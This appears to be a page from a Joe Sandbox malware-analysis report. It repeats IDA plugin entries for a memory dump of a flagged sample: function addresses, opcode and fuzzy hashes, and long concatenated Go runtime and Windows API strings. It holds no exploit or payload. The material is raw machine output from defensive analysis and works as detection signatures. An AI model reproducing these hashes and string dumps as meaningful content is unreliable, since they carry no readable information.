Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: !"#$%%&&''((()))*++,,,,,------....//////0001123333333333444444444455666677777888888888889999999999::::::;;;;;;;;;;;;;;;;<<<<<<<<<<<<<<<<=====>>>>>>>>>>>??????????@@@@@@@@@@@@@@@@@@@@@@AAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC$delayed zeroing on data that may contain pointersfully empty unfreed span set block found in resetinvalid memory address or nil pointer dereferenceinvalid or incomplete multibyte or wide characternot enough significant bits after mult128bitPow10panicwrap: unex$malloc deadlockmisaligned maskmissing addressmissing mcache?ms: gomaxprocs=network is downno medium foundno such processpreempt SPWRITErecovery failedruntime error: runtime: frame runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm$malloc during signalnotetsleep not on g0p mcache not flushedpacer: assist ratio=preempt off reason: reflect.makeFuncStubruntime: double waitselectgo: bad wakeupsemaRoot rotateRighttime: invalid numbertrace: out of memorywirep: already in goworkbuf is not empty$mallocgc called with gcphase == _GCmarkterminationrecursive call during initialization - linker skewruntime: unable to acquire - semaphore out of syncfatal: systemstack called from unexpected goroutinelimiterEvent.stop: invalid limiter event type foundpotentia$mallocgc called without a P or outside bootstrappingruntime.SetFinalizer: pointer not in allocated blockruntime: GetQueuedCompletionStatusEx failed (errno= runtime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in reset
API String ID: 0-2519504355
Opcode ID: baefe37439721d196a2d2981a8a4d5e500dd2a55388cb677aeb184dd73ad22e5
Instruction ID: 8153796a01537ae9556a306288e01b229148fefcec7f43fc16d57af92ec99a9b
Opcode Fuzzy Hash: baefe37439721d196a2d2981a8a4d5e500dd2a55388cb677aeb184dd73ad22e5
Instruction Fuzzy Hash: 0022C172718B94C2DB10CB16E4407AABB75F389BE4F585226EF9D07B65CB79C884C740

Function 00A95D20 Relevance: 7.8, Strings: 6, Instructions: 297COMMON

Download Yara Rule

Strings

runtime: gp: gp=runtime: getg: g=runtime: npages = runtime: range = {runtime: textAddr segmentation faultserver misbehavingstopping the worldstreams pipe errorsync.RWMutex.RLocksystem page size (tracebackancestorsuse of closed filevalue out of range [contro, xrefs: 00A96147
, g->atomicstatus=, gp->atomicstatus=14901161193847656257450580596923828125Altai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreatePseudoConsoleCreateSymbolicLinkWCryptReleaseContextDisconnectNamedPipeEgypt Standard TimeGC mark termi, xrefs: 00A9620F
suspendG from non-preemptible goroutinetraceback: unexpected SPWRITE function transport endpoint is already connected13877787807814456755295395851135253906256938893903907228377647697925567626953125MapIter.Key called on exhausted iteratoraddress family not supp, xrefs: 00A9624B
invalid g statusmSpanList.insertmSpanList.removemessage too longmissing stackmapno route to hostnon-Go functionobject is remotereflect mismatchremote I/O errorruntime: addr = runtime: base = runtime: head = runtime: nelems=schedule: in cgotime: bad [0-9]*work, xrefs: 00A9623A
, goid=, j0 = 19531259765625: type AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitJanuaryKannadaMUI_DltMUI_StdMakasarMandaicMarchenMultaniMyanmarOctoberOsmanyaPATHEXTRadicalSharadaShavianSiddhamSinhalaSleepExS, xrefs: 00A96165, 00A961EF
, gp->atomicstatus=14901161193847656257450580596923828125Altai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreatePseudoConsoleCreateSymbolicLinkWCryptReleaseContextDisconnectNamedPipeEgypt Standard TimeGC mark terminationGC work not f, xrefs: 00A96185

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: , g->atomicstatus=, gp->atomicstatus=14901161193847656257450580596923828125Altai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreatePseudoConsoleCreateSymbolicLinkWCryptReleaseContextDisconnectNamedPipeEgypt Standard TimeGC mark termi$, goid=, j0 = 19531259765625: type AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitJanuaryKannadaMUI_DltMUI_StdMakasarMandaicMarchenMultaniMyanmarOctoberOsmanyaPATHEXTRadicalSharadaShavianSiddhamSinhalaSleepExS$, gp->atomicstatus=14901161193847656257450580596923828125Altai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreatePseudoConsoleCreateSymbolicLinkWCryptReleaseContextDisconnectNamedPipeEgypt Standard TimeGC mark terminationGC work not f$invalid g statusmSpanList.insertmSpanList.removemessage too longmissing stackmapno route to hostnon-Go functionobject is remotereflect mismatchremote I/O errorruntime: addr = runtime: base = runtime: head = runtime: nelems=schedule: in cgotime: bad [0-9]*work$runtime: gp: gp=runtime: getg: g=runtime: npages = runtime: range = {runtime: textAddr segmentation faultserver misbehavingstopping the worldstreams pipe errorsync.RWMutex.RLocksystem page size (tracebackancestorsuse of closed filevalue out of range [contro$suspendG from non-preemptible goroutinetraceback: unexpected SPWRITE function transport endpoint is already connected13877787807814456755295395851135253906256938893903907228377647697925567626953125MapIter.Key called on exhausted iteratoraddress family not supp
API String ID: 0-3672669220
Opcode ID: e54ce2b105fd2c8edaca040efa7366b8e74ff0aafeaac0783cf49c9dd368bbed
Instruction ID: 2fcb78923bbfdece61c167e9242c609bbc08f1523b682e5cde1d665062e7bb38
Opcode Fuzzy Hash: e54ce2b105fd2c8edaca040efa7366b8e74ff0aafeaac0783cf49c9dd368bbed
Instruction Fuzzy Hash: A9D19D36718B80C6DB14DB25E08176EBBB1F789B90F549266EF9D07B69CB39C840CB50

Function 00A7E980 Relevance: 6.4, Strings: 5, Instructions: 174COMMON

Download Yara Rule

Strings

->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/???ADTASTBSTCATCDTCETCSTDltEATEDTEETEOFES, xrefs: 00A7EBD5
MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625: unknown pc CertOpenStoreCoTaskMemFreeDeleteService, xrefs: 00A7EBF4
+/1;<=CLMPSZ["]_`hs{} + @ P [(") )(), ->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/??, xrefs: 00A7EC0F
pacer: assist ratio=preempt off reason: reflect.makeFuncStubruntime: double waitselectgo: bad wakeupsemaRoot rotateRighttime: invalid numbertrace: out of memorywirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not found of unexported metho, xrefs: 00A7EB77
(scan (scan) MB in Value> allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, goid=, j0 = 19531259765625: type AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitJanuaryKannadaMUI_DltM, xrefs: 00A7EB97

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: (scan (scan) MB in Value> allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, goid=, j0 = 19531259765625: type AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitJanuaryKannadaMUI_DltM$ MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625: unknown pc CertOpenStoreCoTaskMemFreeDeleteService$+/1;<=CLMPSZ["]_`hs{} + @ P [(") )(), ->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/??$->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/???ADTASTBSTCATCDTCETCSTDltEATEDTEETEOFES$pacer: assist ratio=preempt off reason: reflect.makeFuncStubruntime: double waitselectgo: bad wakeupsemaRoot rotateRighttime: invalid numbertrace: out of memorywirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not found of unexported metho
API String ID: 0-3405224977
Opcode ID: b738ce476bd38ed1e30c5793ad251397a01286f076ef35dea47c09fa33802a05
Instruction ID: 11f9665f60725cb1ae484d795a0d829315100e08e3254541b3b6a7540cd39bcb
Opcode Fuzzy Hash: b738ce476bd38ed1e30c5793ad251397a01286f076ef35dea47c09fa33802a05
Instruction Fuzzy Hash: 6071BD72618F8489D712EB21E84035EB7A4FB9ABC0F08C676EA4E67726DF38C041C710

Function 00A99640 Relevance: 5.3, Strings: 4, Instructions: 256COMMON

Download Yara Rule

Strings

newval= nfreed= packed= pointer stack=[ status %!Month(-command48828125AcceptExArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeClassANYCyrillicDecemberDuployanEqualSidEthiopicExtenderFebruaryFullPathGeorgianGoStringGujaratiGurmukhiHiraganaIsWindowJava, xrefs: 00A99A28
casgstatus: bad incoming valuescheckmark found unmarked objectencoding/hex: invalid byte: %#Uentersyscallblock inconsistent fmt: unknown base; can't happeninternal error - misuse of itabinvalid network interface indexmalformed time zone informationnon in-use s, xrefs: 00A99A4F
runtime: casgstatus: oldval=runtime: no module data for save on system g not allowed45474735088646411895751953125CM_Get_Device_Interface_ListWCentral America Standard TimeCentral Pacific Standard TimeChatham Islands Standard TimeDeleteProcThreadAttributeListGe, xrefs: 00A99A0D
casgstatus: waiting for Gwaiting but is Grunnabledelayed zeroing on data that may contain pointersfully empty unfreed span set block found in resetinvalid memory address or nil pointer dereferenceinvalid or incomplete multibyte or wide characternot enough sign, xrefs: 00A999C5

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: newval= nfreed= packed= pointer stack=[ status %!Month(-command48828125AcceptExArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeClassANYCyrillicDecemberDuployanEqualSidEthiopicExtenderFebruaryFullPathGeorgianGoStringGujaratiGurmukhiHiraganaIsWindowJava$casgstatus: bad incoming valuescheckmark found unmarked objectencoding/hex: invalid byte: %#Uentersyscallblock inconsistent fmt: unknown base; can't happeninternal error - misuse of itabinvalid network interface indexmalformed time zone informationnon in-use s$casgstatus: waiting for Gwaiting but is Grunnabledelayed zeroing on data that may contain pointersfully empty unfreed span set block found in resetinvalid memory address or nil pointer dereferenceinvalid or incomplete multibyte or wide characternot enough sign$runtime: casgstatus: oldval=runtime: no module data for save on system g not allowed45474735088646411895751953125CM_Get_Device_Interface_ListWCentral America Standard TimeCentral Pacific Standard TimeChatham Islands Standard TimeDeleteProcThreadAttributeListGe
API String ID: 0-1658484963
Opcode ID: 608888e9f401eb7c8a627ae7bc340330ef59856c8b0f9c59afed00ae85f27f7f
Instruction ID: 54e0b1aeb473caa04791dc1d4dbc7d9b77938cf6cdb1c7b9be08a8f597cfdb68
Opcode Fuzzy Hash: 608888e9f401eb7c8a627ae7bc340330ef59856c8b0f9c59afed00ae85f27f7f
Instruction Fuzzy Hash: 17B18E36709A80D6EB14CB29E58575FB7B1F34AB80F54822AEF9C43B65DB3AC441CB50

Function 00A657E0 Relevance: 4.1, Strings: 3, Instructions: 381COMMON

Download Yara Rule

Strings

unreachableuserenv.dllversion.dll B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= maxTrigger= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<n, xrefs: 00A658DB
chansend: spurious wakeupcheckdead: no m for timercheckdead: no p for timerinconsistent poll.fdMutexinvalid cross-device linkinvalid network interfacemissing stack in newstackmissing traceGCSweepStartno answer from DNS serverno buffer space availableno such de, xrefs: 00A65DA2
G waiting list is corruptedGetSecurityDescriptorLengthGetUserPreferredUILanguagesSetupDiClassNameFromGuidExWSetupDiGetDeviceInstanceIdWSetupDiGetDriverInfoDetailWStartServiceCtrlDispatcherWaddress not a stack addresschannel number out of rangecommunication err, xrefs: 00A65DC6

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: G waiting list is corruptedGetSecurityDescriptorLengthGetUserPreferredUILanguagesSetupDiClassNameFromGuidExWSetupDiGetDeviceInstanceIdWSetupDiGetDriverInfoDetailWStartServiceCtrlDispatcherWaddress not a stack addresschannel number out of rangecommunication err$chansend: spurious wakeupcheckdead: no m for timercheckdead: no p for timerinconsistent poll.fdMutexinvalid cross-device linkinvalid network interfacemissing stack in newstackmissing traceGCSweepStartno answer from DNS serverno buffer space availableno such de$unreachableuserenv.dllversion.dll B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= maxTrigger= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<n
API String ID: 0-4202362714
Opcode ID: b7769fee57e17396a0436e3ce002888f0c7aa98ca916b6e337a4966eba411b2f
Instruction ID: e0c1562e2998800737989908007758644e6ae8d4a4a53121d9b25e168b4663cc
Opcode Fuzzy Hash: b7769fee57e17396a0436e3ce002888f0c7aa98ca916b6e337a4966eba411b2f
Instruction Fuzzy Hash: 32F1DE72604F84C6EB10DB25E54079EB7B1F789BE4F985226DA9C47BA9DF38C484CB00

Function 00A92900 Relevance: 4.0, Strings: 3, Instructions: 272COMMON

Download Yara Rule

Strings

runtime.preemptM: duplicatehandle failedruntime: SyscallN has too many argumentsruntime: out of memory: cannot allocate runtime: typeBitsBulkBarrier with type ryuFtoaFixed32 called with negative prectime: Stop called on uninitialized Timer34694469519536141888, xrefs: 00A92D8F
self-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringswintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen MB globals, MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base, xrefs: 00A92DA5
runtime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject unexpected; result=runtime: waitforsingleobject wait_failed; errno=slice bounds out of range [:%x] with capacity %ystrconv: illegal AppendFloat/FormatFloat bitSizewindows: string with, xrefs: 00A92D65

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: runtime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject unexpected; result=runtime: waitforsingleobject wait_failed; errno=slice bounds out of range [:%x] with capacity %ystrconv: illegal AppendFloat/FormatFloat bitSizewindows: string with$runtime.preemptM: duplicatehandle failedruntime: SyscallN has too many argumentsruntime: out of memory: cannot allocate runtime: typeBitsBulkBarrier with type ryuFtoaFixed32 called with negative prectime: Stop called on uninitialized Timer34694469519536141888$self-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringswintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen MB globals, MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base
API String ID: 0-1853117387
Opcode ID: 80aff2d1dd33cf8c9c4b657a890c256719b28202842582c7895b08a8cf974c89
Instruction ID: 1ace5d7f56cd9dcb8c3ab3c6a26025d9419d9f693127820659eba71a95590dba
Opcode Fuzzy Hash: 80aff2d1dd33cf8c9c4b657a890c256719b28202842582c7895b08a8cf974c89
Instruction Fuzzy Hash: 1EC17F36605F8092DB20DF25E8913AEB7A4F74AB90F159232DBAC97B95DF38C581C740

Function 00A66540 Relevance: 2.9, Strings: 2, Instructions: 418COMMON

Download Yara Rule

Strings

unreachableuserenv.dllversion.dll B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= maxTrigger= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<n, xrefs: 00A666F0
G waiting list is corruptedGetSecurityDescriptorLengthGetUserPreferredUILanguagesSetupDiClassNameFromGuidExWSetupDiGetDeviceInstanceIdWSetupDiGetDriverInfoDetailWStartServiceCtrlDispatcherWaddress not a stack addresschannel number out of rangecommunication err, xrefs: 00A66AA4

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
